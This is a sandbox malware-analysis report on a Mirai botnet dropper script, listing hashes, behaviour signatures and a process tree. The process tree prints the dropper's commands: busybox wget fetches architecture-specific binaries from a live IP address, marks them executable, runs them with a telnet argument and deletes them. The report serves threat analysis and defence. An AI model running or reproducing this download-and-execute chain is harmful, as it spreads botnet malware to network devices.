Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    10/03/2025, 22:22

General

  • Target

    wget.sh

  • Size

    1KB

  • MD5

    fe3891afe068ca6fc86017361dfb753c

  • SHA1

    d631b6a4eaa99085df4260727c2c86dc82cf5428

  • SHA256

    8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

  • SHA512

    810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (105128) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 12 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 8 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 20 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 35 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Executes dropped EXE
    PID:721
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
      2⤵
      • Writes file to tmp directory
      PID:723
    • /bin/busybox
      /bin/busybox chmod +x jklarm
      2⤵
      • File and Directory Permissions Modification
      PID:749
    • /tmp/jklarm
      ./jklarm telnet
      2⤵
        PID:750
      • /bin/busybox
        /bin/busybox rm -rf jklarm
        2⤵
          PID:752
        • /bin/busybox
          /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
          2⤵
          • Writes file to tmp directory
          PID:753
        • /bin/busybox
          /bin/busybox chmod +x jklarm5
          2⤵
          • File and Directory Permissions Modification
          PID:754
        • /tmp/jklarm5
          ./jklarm5 telnet
          2⤵
            PID:755
          • /bin/busybox
            /bin/busybox rm -rf jklarm5
            2⤵
              PID:757
            • /bin/busybox
              /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
              2⤵
              • Writes file to tmp directory
              PID:758
            • /bin/busybox
              /bin/busybox chmod +x jklarm6
              2⤵
              • File and Directory Permissions Modification
              PID:759
            • /tmp/jklarm6
              ./jklarm6 telnet
              2⤵
                PID:760
              • /bin/busybox
                /bin/busybox rm -rf jklarm6
                2⤵
                  PID:762
                • /bin/busybox
                  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
                  2⤵
                  • Writes file to tmp directory
                  PID:763
                • /bin/busybox
                  /bin/busybox chmod +x jklarm7
                  2⤵
                  • File and Directory Permissions Modification
                  PID:765
                • /tmp/jklarm7
                  ./jklarm7 telnet
                  2⤵
                    PID:767
                  • /bin/busybox
                    /bin/busybox rm -rf jklarm7
                    2⤵
                      PID:769
                    • /bin/busybox
                      /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
                      2⤵
                      • Writes file to tmp directory
                      PID:770
                    • /bin/busybox
                      /bin/busybox chmod +x jklm68k
                      2⤵
                      • File and Directory Permissions Modification
                      PID:778
                    • /tmp/jklm68k
                      ./jklm68k telnet
                      2⤵
                        PID:779
                      • /bin/busybox
                        /bin/busybox rm -rf jklm68k
                        2⤵
                          PID:782
                        • /bin/busybox
                          /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
                          2⤵
                          • System Network Configuration Discovery
                          • Writes file to tmp directory
                          PID:783
                        • /bin/busybox
                          /bin/busybox chmod +x jklmips
                          2⤵
                          • File and Directory Permissions Modification
                          PID:794
                        • /tmp/jklmips
                          ./jklmips telnet
                          2⤵
                          • System Network Configuration Discovery
                          PID:795
                        • /bin/busybox
                          /bin/busybox rm -rf jklmips
                          2⤵
                          • System Network Configuration Discovery
                          PID:797
                        • /bin/busybox
                          /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
                          2⤵
                          • Writes file to tmp directory
                          PID:799
                        • /bin/busybox
                          /bin/busybox chmod +x jklmpsl
                          2⤵
                          • File and Directory Permissions Modification
                          PID:809
                        • /tmp/jklmpsl
                          ./jklmpsl telnet
                          2⤵
                          • Modifies Watchdog functionality
                          • Renames itself
                          • Enumerates active TCP sockets
                          • Reads process memory
                          • Changes its process name
                          • Reads system network configuration
                          • Reads runtime system information
                          PID:811
                        • /bin/busybox
                          /bin/busybox rm -rf jklmpsl
                          2⤵
                            PID:814
                          • /bin/busybox
                            /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
                            2⤵
                            • Writes file to tmp directory
                            PID:816
                          • /bin/busybox
                            /bin/busybox chmod +x jklppc
                            2⤵
                            • File and Directory Permissions Modification
                            PID:865
                          • /tmp/jklppc
                            ./jklppc telnet
                            2⤵
                              PID:866
                            • /bin/busybox
                              /bin/busybox rm -rf jklppc
                              2⤵
                                PID:868
                              • /bin/busybox
                                /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
                                2⤵
                                  PID:869
                                • /bin/busybox
                                  /bin/busybox chmod +x jklsh4
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:870
                                • /tmp/jklsh4
                                  ./jklsh4 telnet
                                  2⤵
                                    PID:871
                                  • /bin/busybox
                                    /bin/busybox rm -rf jklsh4
                                    2⤵
                                      PID:872
                                    • /bin/busybox
                                      /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
                                      2⤵
                                        PID:873
                                      • /bin/busybox
                                        /bin/busybox chmod +x jklspc
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:874
                                      • /tmp/jklspc
                                        ./jklspc telnet
                                        2⤵
                                          PID:875
                                        • /bin/busybox
                                          /bin/busybox rm -rf jklspc
                                          2⤵
                                            PID:876
                                          • /bin/busybox
                                            /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
                                            2⤵
                                              PID:877
                                            • /bin/busybox
                                              /bin/busybox chmod +x jklx86
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:878
                                            • /tmp/jklx86
                                              ./jklx86 telnet
                                              2⤵
                                                PID:879
                                              • /bin/busybox
                                                /bin/busybox rm -rf jklx86
                                                2⤵
                                                  PID:880
                                                • /bin/busybox
                                                  /bin/busybox wget http://176.65.134.5/jklarc -O jklarc
                                                  2⤵
                                                    PID:881
                                                  • /bin/busybox
                                                    /bin/busybox chmod +x jklarc
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:882
                                                  • /tmp/jklarc
                                                    ./jklarc telnet
                                                    2⤵
                                                      PID:883
                                                    • /bin/busybox
                                                      /bin/busybox rm -rf jklarc
                                                      2⤵
                                                        PID:884
                                                      • /bin/busybox
                                                        /bin/busybox rm -rf wget.sh
                                                        2⤵
                                                          PID:885

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • /tmp/jklarm

                                                        Filesize

                                                        60KB

                                                        MD5

                                                        35c215d8e2b2ea03a8a191fb3723195a

                                                        SHA1

                                                        c38bcfc3d7050edeff1b7dbffd85d07348bb01e9

                                                        SHA256

                                                        c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90

                                                        SHA512

                                                        ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

                                                      • /tmp/jklarm5

                                                        Filesize

                                                        60KB

                                                        MD5

                                                        a04040c769cad786555e183ba8ae0ca0

                                                        SHA1

                                                        a89d6b50a8140dddce29595c64949214e65c84f1

                                                        SHA256

                                                        7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3

                                                        SHA512

                                                        e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

                                                      • /tmp/jklarm6

                                                        Filesize

                                                        69KB

                                                        MD5

                                                        9e18604aa4c5bedd6e9ea6690b751880

                                                        SHA1

                                                        c1f32fe93aa650f9920fc5bd659d23621ab034a2

                                                        SHA256

                                                        41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb

                                                        SHA512

                                                        cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

                                                      • /tmp/jklarm7

                                                        Filesize

                                                        82KB

                                                        MD5

                                                        a9675614a267473cb83e195d9074a067

                                                        SHA1

                                                        a4d148cf841fc2b84c8bb3dd322e40f601532875

                                                        SHA256

                                                        fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9

                                                        SHA512

                                                        8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28

                                                      • /tmp/jklm68k

                                                        Filesize

                                                        60KB

                                                        MD5

                                                        f5fa9a5e6c2a71c86b783b6b5586c3e4

                                                        SHA1

                                                        1a7888806663b58f4bee84472dab0b63adfab8ea

                                                        SHA256

                                                        d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d

                                                        SHA512

                                                        e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a

                                                      • /tmp/jklmips

                                                        Filesize

                                                        78KB

                                                        MD5

                                                        ce4bd94ea8cbc021bf79e11f1f734c25

                                                        SHA1

                                                        f562c88119484f3e92be6e95cb0a435836ca6362

                                                        SHA256

                                                        ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab

                                                        SHA512

                                                        d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29

                                                      • /tmp/jklmpsl

                                                        Filesize

                                                        79KB

                                                        MD5

                                                        9f79f159a672411a7e5b01f1ed3deb4a

                                                        SHA1

                                                        98584c58a231322ed3e64b96727fe6d935f30aa4

                                                        SHA256

                                                        9cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa

                                                        SHA512

                                                        8486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537

                                                      • /tmp/jklppc

                                                        Filesize

                                                        59KB

                                                        MD5

                                                        2d898ada13cb85e3fc710949c44ade47

                                                        SHA1

                                                        db36b96c9531eff756b3d2ee92b632bc4903a179

                                                        SHA256

                                                        00188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd

                                                        SHA512

                                                        e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78